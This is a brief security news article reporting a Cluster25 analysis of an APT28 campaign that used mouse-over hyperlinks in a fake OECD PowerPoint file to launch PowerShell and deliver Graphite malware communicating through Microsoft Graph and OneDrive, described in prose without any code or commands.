Russia-based hackers are using a novel code execution technique that uses mouse movements in Microsoft PowerPoint presentations to trigger malicious PowerShell scripts.
What happened?
A Cluster25 report states that APT28, aka FancyBear, a threat group linked to the Russian GRU, has used the new technique to deliver Graphite malware this month. The researchers note that the targets include entities in the defense and government sectors in the EU and Eastern Europe.
Modus operandi
The threat actor allures victims with a PowerPoint file purportedly associated with the Organization for Economic Cooperation and Development (OECD).
- The file includes two slides with instructions in English and French for accessing the translation feature in Zoom.
- The PPT incorporates a hyperlink that serves as a trigger for deploying a malicious PowerShell script.
- PowerShell script downloads a JPEG image containing an encrypted DLL file. The resulting payload is Graphite malware in Portable Executable (PE) form, which allows the attacker to load other malware into system memory.
Other details
The JPEG is an encrypted DLL file that is decrypted, dropped into the system memory, and executed via rundll32.exe. The thread continues, and every new file requires a different XOR key for deobfuscation.
- Graphite abuses the Microsoft Graph API and OneDrive to communicate with the C2 server. The threat actor uses a fixed client ID to obtain a valid OAuth2 token.
- The token allows Graphite to look into Microsoft GraphAPIs and identify new files. If found, the content is downloaded and decrypted through an algorithm.
- The malware allows the RCE attack by allocating a new memory region and executing the received shellcode by calling a new dedicated thread.
Conclusion
Cluster25 analysts state that the hackers have been planning the campaign since January or February. However, the URLs used in the attacks were active in August and September. With hackers attempting to carry out more stealthy operations, government and private entities must employ the right solutions to prevent breaches and protect themselves.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/shutterstock_397754680.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/9c54_shutterstock_285665918.jpg)
